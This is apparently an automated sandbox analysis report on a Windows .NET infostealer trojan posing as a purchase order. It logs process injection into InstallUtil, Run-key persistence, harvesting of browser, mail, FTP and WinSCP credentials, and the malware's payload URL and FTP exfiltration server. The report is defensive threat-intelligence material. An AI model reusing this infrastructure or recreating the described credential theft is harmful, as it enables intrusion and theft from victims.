                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D3E008
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Queries volume information: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe VolumeInformation
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Queries volume information: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5996, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7140, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5996, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7140, type: MEMORYSTR

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                      Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                      Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 12 Virtualization/Sandbox Evasion; 211 Process Injection
                      Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                      Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 311 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 1 Process Discovery; Wi-Fi Discovery; Remote System Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                      Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                      Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port
                      Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                      Behavior Graph ID: 1527719 Sample: PO_7862679238279-GITTERSTAR... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100
                      • DNS/IP: ftp.alternatifplastik.com
                      • DNS/IP: wymascensores.com
                      • Signature: Multi AV Scanner detection for domain / URL
                      • Signature: Suricata IDS alerts for network traffic
                      • Signature: Found malware configuration
                      • Signature: 10 other signatures
                      • Process started: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe 16 4
                        • DNS/IP: wymascensores.com 67.212.175.162, 443, 49730, 49733 SINGLEHOP-LLCUS United States
                        • File dropped: C:\Users\user\AppData\...\Avycqjqvmh.exe, PE32
                        • File dropped: C:\Users\...\Avycqjqvmh.exe:Zone.Identifier, ASCII
                        • Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        • Signature: Writes to foreign memory regions
                        • Signature: Injects a PE file into a foreign processes
                        • Process started: InstallUtil.exe 14 2
                          • DNS/IP: ftp.alternatifplastik.com 5.2.84.236, 21, 49640, 49731 ALASTYRTR Turkey
                          • Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      • Process started: Avycqjqvmh.exe 2
                        • Process started: InstallUtil.exe
                          • Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          • Signature: Tries to steal Mail credentials (via file / registry access)
                          • Signature: Tries to harvest and steal ftp login credentials
                          • Signature: Tries to harvest and steal browser information (history, passwords, etc)
                      • Process started: Avycqjqvmh.exe 14 2
                        • Signature: Multi AV Scanner detection for dropped file
                        • Signature: Machine Learning detection for dropped file
                        • Process started: InstallUtil.exe 2

                      Source | Detection | Scanner | Label | Link
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | 63% | ReversingLabs | Win32.Trojan.Znyonm |
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | 28% | Virustotal | | Browse
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\Avycqjqvmh.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\Avycqjqvmh.exe | 63% | ReversingLabs | Win32.Trojan.Znyonm |

                      No Antivirus matches

                      Source | Detection | Scanner | Label | Link
                      wymascensores.com | 11% | Virustotal | | Browse
                      ftp.alternatifplastik.com | 3% | Virustotal | | Browse

                      Source | Detection | Scanner | Label | Link
                      https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
                      https://account.dyn.com/ | 0% | URL Reputation | safe |
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                      https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
                      https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      wymascensores.com | 67.212.175.162 | true | false | | unknown
                      ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      https://wymascensores.com/index/Nbyrwv.dat | true | | unknown

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://github.com/mgravell/protobuf-net | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        https://github.com/mgravell/protobuf-neti | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        https://stackoverflow.com/q/14436606/23354 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://account.dyn.com/ | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://github.com/mgravell/protobuf-netJ | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        https://wymascensores.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://stackoverflow.com/q/11564914/23354; | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://stackoverflow.com/q/2152978/23354 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://wymascensores.com/index/Nbyrwv.datxC | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B91000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                        http://ftp.alternatifplastik.com | InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000332C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000248C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.00000000030AC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

                                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                    67.212.175.162 | wymascensores.com | United States | | 32475 | SINGLEHOP-LLCUS | false
                                    5.2.84.236 | ftp.alternatifplastik.com | Turkey | | 3188 | ALASTYRTR | true

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1527719
                                    Start date and time:2024-10-07 09:12:36 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 465
                                    • Number of non-executed functions: 42
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Time | Type | Description
                                    08:13:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Avycqjqvmh C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                    08:13:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Avycqjqvmh C:\Users\user\AppData\Roaming\Avycqjqvmh.exe

                                                        Process:C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2945024
                                                        Entropy (8bit):5.685544277138753
                                                        Encrypted:false
                                                        SSDEEP:24576:pcid/6VwqvqxO7eeuDy/3gQovH9k+wMANi2Cc0QTDy22k/X37DNO7w6qIGigNKpM:v6owTwRSJXMdSbIl9Lo5qGnzQ9g
                                                        MD5:68B39CED0840D43E3A03E2F92C268C72
                                                        SHA1:9DFB2CE520E0DF7000D2C2A05A012D4446904480
                                                        SHA-256:D96D65AAB0E55FB6E3D470C7DC58C8C6E687C81DF626B60C7461C9349734D240
                                                        SHA-512:6DD61A3E004E75B213B305D62C23189BD7BEBED23A390BBD15AA65E2A2C9B3A23C1FFF14BA0947D8650AF2A76972B4920208D7763C15919406BE41BE52E32958
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.685544277138753
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        File size:2'945'024 bytes
                                                        MD5:68b39ced0840d43e3a03e2f92c268c72
                                                        SHA1:9dfb2ce520e0df7000d2c2a05a012d4446904480
                                                        SHA256:d96d65aab0e55fb6e3d470c7dc58c8c6e687c81df626b60c7461c9349734d240
                                                        SHA512:6dd61a3e004e75b213b305d62c23189bd7bebed23a390bbd15aa65e2a2c9b3a23c1fff14ba0947d8650af2a76972b4920208d7763c15919406be41be52e32958
